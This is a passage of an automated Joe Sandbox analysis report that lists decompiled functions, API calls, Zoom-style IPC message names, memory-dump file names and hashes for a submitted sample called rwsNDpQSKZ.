                  • Part of subcall function 00C88F0D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F40
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F6E
                  • Part of subcall function 00C88F0D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88FAB
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value), ref: 00C88FDB
                  • Part of subcall function 00C88F0D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name), ref: 00C89047
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@
                • String ID: MeetingID$Password$Reason$com.zoom.app.notifyStartLogin
                • API String ID: 491978956-3204209225
                • Opcode ID: 04f6ebbebc7c2ca8fcec525436c645a3e23feb92f5dc70f3b02c4538580ca862
                • Instruction ID: bcfd1e04919151b6762dfd0519f3a466144706dc8a2e5f18b724edc33a827b6b
                • Opcode Fuzzy Hash: 04f6ebbebc7c2ca8fcec525436c645a3e23feb92f5dc70f3b02c4538580ca862
                • Instruction Fuzzy Hash: 74F02BB0644755BFD32077446C46B2922E4E764B8EF40002DB1047E3C1CBF00C48DB76
                Function 00C705F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C705F7
                • ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.realname.auth.info,00002752,IsLogin,SignUpURL,BindPhoneURL,00000004), ref: 00C7061C
                  • Part of subcall function 00C875B0: __EH_prolog3.LIBCMT ref: 00C875B7
                  • Part of subcall function 00C875B0: ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C874D5,?,?,?,?,?,00000004,00C7F508,?,?,?), ref: 00C875CD
                  • Part of subcall function 00C8DE55: __EH_prolog3_GS.LIBCMT ref: 00C8DE5C
                  • Part of subcall function 00C8DE55: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DE88
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEB6
                  • Part of subcall function 00C8DE55: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEF3
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid), ref: 00C8DF23
                  • Part of subcall function 00C8DE55: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result), ref: 00C8DF8F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$Cmm@@@CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: BindPhoneURL$IsLogin$SignUpURL$com.Zoom.app.conf.realname.auth.info
                • API String ID: 3310136194-1378626793
                • Opcode ID: e2d61ed9727405c73a2d55222666db6eb5ba429866e91a2d13af543f657e0016
                • Instruction ID: ee443c71be91382bb7e01c3097d440e62ed83f1df49b0b1c8449cd85f1c827e3
                • Opcode Fuzzy Hash: e2d61ed9727405c73a2d55222666db6eb5ba429866e91a2d13af543f657e0016
                • Instruction Fuzzy Hash: 97F0E5B0644354FAD710AF009C06B292364EB50F18F10853CB1045E3C2CBF08C05DB39
                Function 00C74590 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74597
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.status.notification,00009D35,type,status,indicateID,00000004), ref: 00C745BC
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: com.zoom.app.assistant.voice.command.status.notification$indicateID$status$type
                • API String ID: 2610200052-2905355676
                • Opcode ID: 5c54005cd712f47ae63adf6dd2266a578140cbe99a526988fe63e59fc4b06bbb
                • Instruction ID: 11b888ae131c07a552a1c715d3d31ea696bb9df528efce86c9bb7451b445e7e4
                • Opcode Fuzzy Hash: 5c54005cd712f47ae63adf6dd2266a578140cbe99a526988fe63e59fc4b06bbb
                • Instruction Fuzzy Hash: DDF02BB1640781FBE7106B049C86B6E72A4DB80B59F510418F1045E7C2C7F00D48D775
                Function 00C72560 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72567
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.muteaudio.request,00009E7D,UserID,AudioOn,FromDevice,00000004), ref: 00C7258C
                  • Part of subcall function 00C92B00: __EH_prolog3.LIBCMT ref: 00C92B07
                  • Part of subcall function 00C92B00: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C72591,com.zoom.app.cci.ccivideo.muteaudio.request,00009E7D,UserID,AudioOn,FromDevice,00000004), ref: 00C92B1D
                  • Part of subcall function 00C8D759: __EH_prolog3_GS.LIBCMT ref: 00C8D760
                  • Part of subcall function 00C8D759: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID,ActionType,Result,00000004), ref: 00C8D78C
                  • Part of subcall function 00C8D759: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID,ActionType,Result,00000004), ref: 00C8D7BA
                  • Part of subcall function 00C8D759: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID,ActionType,Result,00000004), ref: 00C8D7F7
                  • Part of subcall function 00C8D759: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID,ActionType,Result), ref: 00C8D827
                  • Part of subcall function 00C8D759: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID), ref: 00C8D893
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: AudioOn$FromDevice$UserID$com.zoom.app.cci.ccivideo.muteaudio.request
                • API String ID: 2695935728-1587232973
                • Opcode ID: 0e2bf14ca96d39b8718d444889795c770f26eef50c171c218c601167985dcb35
                • Instruction ID: 6d4a3027ffaab7837b9a18fed984dc18ad5803fab5f9c79114c7a064ddbb4cf1
                • Opcode Fuzzy Hash: 0e2bf14ca96d39b8718d444889795c770f26eef50c171c218c601167985dcb35
                • Instruction Fuzzy Hash: 96F0E5B0B81384BBD7106B54BC1BB2A66B4AF40B16F008528B1046A3D1CBF14C44C772
                Function 00C76640 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76647
                • ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.ps.update_key_value_info,00013884,type,key,value,00000004), ref: 00C7666C
                  • Part of subcall function 00C875B0: __EH_prolog3.LIBCMT ref: 00C875B7
                  • Part of subcall function 00C875B0: ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C874D5,?,?,?,?,?,00000004,00C7F508,?,?,?), ref: 00C875CD
                  • Part of subcall function 00C8DE55: __EH_prolog3_GS.LIBCMT ref: 00C8DE5C
                  • Part of subcall function 00C8DE55: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DE88
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEB6
                  • Part of subcall function 00C8DE55: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEF3
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid), ref: 00C8DF23
                  • Part of subcall function 00C8DE55: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result), ref: 00C8DF8F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$Cmm@@@CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: com.zoom.ps.update_key_value_info$key$type$value
                • API String ID: 3310136194-2826525806
                • Opcode ID: 6cf2af30a29f9386e6ae25b2a659ef7ee9a663daa42a1f8094783b39b2a0741c
                • Instruction ID: 50b3a57df0196b33dcda3cb4b1b8e55f2a41ee08d41f775223ece8e6b8342112
                • Opcode Fuzzy Hash: 6cf2af30a29f9386e6ae25b2a659ef7ee9a663daa42a1f8094783b39b2a0741c
                • Instruction Fuzzy Hash: BEF0EDE0785B84FADB156F089C86B6AA2A4A780B5AF500128B1006E3C2CAF80A08D775
                Function 00C727A0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C727A7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.invitebyphone.request,00009E83,CountryCode,PhoneNumber,Name,00000004), ref: 00C727CC
                  • Part of subcall function 00C85460: __EH_prolog3.LIBCMT ref: 00C85467
                  • Part of subcall function 00C85460: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C85365,?,?,?,?,?,00000004,00C7FCD8,?,?,?), ref: 00C8547D
                  • Part of subcall function 00C88F0D: __EH_prolog3_GS.LIBCMT ref: 00C88F14
                  • Part of subcall function 00C88F0D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F40
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F6E
                  • Part of subcall function 00C88F0D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88FAB
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value), ref: 00C88FDB
                  • Part of subcall function 00C88F0D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name), ref: 00C89047
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@
                • String ID: CountryCode$Name$PhoneNumber$com.zoom.app.cci.ccivideo.invitebyphone.request
                • API String ID: 491978956-1565034923
                • Opcode ID: 8dbc73ae8e4f767aaa09e508ccfcb980edeb44d500255b1d04a0775a7f78c0d1
                • Instruction ID: b843c573f4ad7326ee520d16f1a8cd3b80e9bdfe037526cc8faa9b21a4f7eafe
                • Opcode Fuzzy Hash: 8dbc73ae8e4f767aaa09e508ccfcb980edeb44d500255b1d04a0775a7f78c0d1
                • Instruction Fuzzy Hash: ACF06DB0B407957FE710BB54AC86F2AA2A4BB80F19F55412CF2545A3C2CAF94D48C775
                Function 00C70710 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70717
                • ??0?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.upload.exception.memory.log.request,00009CE5,TroubleType,TroubleTime,TroubleReason,00000004), ref: 00C7073C
                  • Part of subcall function 00C8C980: __EH_prolog3.LIBCMT ref: 00C8C987
                  • Part of subcall function 00C8C980: ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8C8E5,?,?,?,?,?,00000004,00C6CAA4,com.Zoom.app.meeting.cache.bytes.kv.op,0000275B,data_type), ref: 00C8C99D
                  • Part of subcall function 00C8DE55: __EH_prolog3_GS.LIBCMT ref: 00C8DE5C
                  • Part of subcall function 00C8DE55: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DE88
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEB6
                  • Part of subcall function 00C8DE55: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEF3
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid), ref: 00C8DF23
                  • Part of subcall function 00C8DE55: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result), ref: 00C8DF8F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
